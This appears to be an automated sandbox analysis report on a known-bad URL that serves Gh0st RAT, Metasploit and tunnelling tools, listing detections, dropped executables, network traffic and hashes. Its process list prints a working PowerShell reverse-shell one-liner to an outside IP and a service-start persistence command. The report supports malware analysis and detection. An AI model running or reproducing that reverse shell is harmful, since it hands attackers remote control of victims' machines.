Analysis Overview
Threat Level: Known bad
The file http://193.42.40.120:65532/ was found to be: Known bad.
Malicious Activity Summary
Gh0strat
MetaSploit
Gh0st RAT payload
Downloads MZ/PE file
Blocklisted process makes network request
VMProtect packed file
Executes dropped EXE
Launches sc.exe
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-05 17:11
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-05 17:11
Reported
2024-04-05 17:14
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gh0strat
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\a.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ew.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\iox.exe | N/A |
| N/A | N/A | C:\Program Files\Common Files\en-US\avservice.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\iox.vmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\iox.vmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\jp.vmp1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\lcx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\mm.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\s5.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\server.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 812889.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 228742.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 49884.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 545744.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 89513.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 871022.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 329724.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 4555.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 147682.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 371741.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 619887.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://193.42.40.120:65532/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff967b846f8,0x7ff967b84708,0x7ff967b84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6192 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6124 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6224 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5552 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6264 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\2.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('198.13.46.131',12888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
C:\Users\Admin\Downloads\a.exe
"C:\Users\Admin\Downloads\a.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && ping 127.0.0.1 && ping 127.0.0.1 && sc start NetworkNetman
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\Downloads\ew.exe
"C:\Users\Admin\Downloads\ew.exe"
C:\Users\Admin\Downloads\iox.exe
"C:\Users\Admin\Downloads\iox.exe"
C:\Windows\SysWOW64\sc.exe
sc start NetworkNetman
C:\Program Files\Common Files\en-US\avservice.exe
"C:\Program Files\Common Files\en-US\avservice.exe"
C:\Users\Admin\Downloads\iox.vmp.exe
"C:\Users\Admin\Downloads\iox.vmp.exe"
C:\Users\Admin\Downloads\iox.vmp.exe
"C:\Users\Admin\Downloads\iox.vmp.exe"
C:\Users\Admin\Downloads\jp.vmp1.exe
"C:\Users\Admin\Downloads\jp.vmp1.exe"
C:\Users\Admin\Downloads\lcx.exe
"C:\Users\Admin\Downloads\lcx.exe"
C:\Users\Admin\Downloads\mm.exe
"C:\Users\Admin\Downloads\mm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6484 /prefetch:2
C:\Users\Admin\Downloads\s5.exe
"C:\Users\Admin\Downloads\s5.exe"
C:\Users\Admin\Downloads\server.exe
"C:\Users\Admin\Downloads\server.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\powershell-reverse-shell.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| US | 8.8.8.8:53 | 211.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| US | 8.8.8.8:53 | 120.40.42.193.in-addr.arpa | udp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.rejetto.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| JP | 198.13.46.131:12888 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | winxxoo.jumpxxoo.com | udp |
| TW | 193.42.40.120:443 | winxxoo.jumpxxoo.com | tcp |
| JP | 198.13.46.131:8989 | tcp | |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
| TW | 193.42.40.120:65532 | winxxoo.jumpxxoo.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0764f5481d3c05f5d391a36463484b49 |
| SHA1 | 2c96194f04e768ac9d7134bc242808e4d8aeb149 |
| SHA256 | cc773d1928f4a87e10944d153c23a7b20222b6795c9a0a09b81a94c1bd026ac3 |
| SHA512 | a39e4cb7064fdd7393ffe7bb3a5e672b1bdc14d878cac1c5c9ceb97787454c5a4e7f9ae0020c6d524920caf7eadc9d49e10bee8799d73ee4e8febe7e51e22224 |
\??\pipe\LOCAL\crashpad_2924_NHNSGZGRXIQCYKSO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e494d16e4b331d7fc483b3ae3b2e0973 |
| SHA1 | d13ca61b6404902b716f7b02f0070dec7f36edbf |
| SHA256 | a43f82254638f7e05d1fea29e83545642f163a7a852f567fb2e94f0634347165 |
| SHA512 | 016b0ed886b33d010c84ca080d74fa343da110db696655c94b71a4cb8eb8284748dd83e06d0891a6e1e859832b0f1d07748b11d4d1a4576bbe1bee359e218737 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9ecacaa0f8706fc051ed66f044f9045f |
| SHA1 | c92ebcb76c57476c8083cd9cb51c20407c3777d3 |
| SHA256 | 728832f2c4a6680d5e0426b8096fb16e71cd5c1a69d6a2c27d6bdba8918fd848 |
| SHA512 | fb389195f0771fb307698c39af780f12fb56a207afcbcdf1c2b5a6639d61f2b44471c187278e6031f6afff4d2c3c66690beef76767e4ae6f4f79a431827c112a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
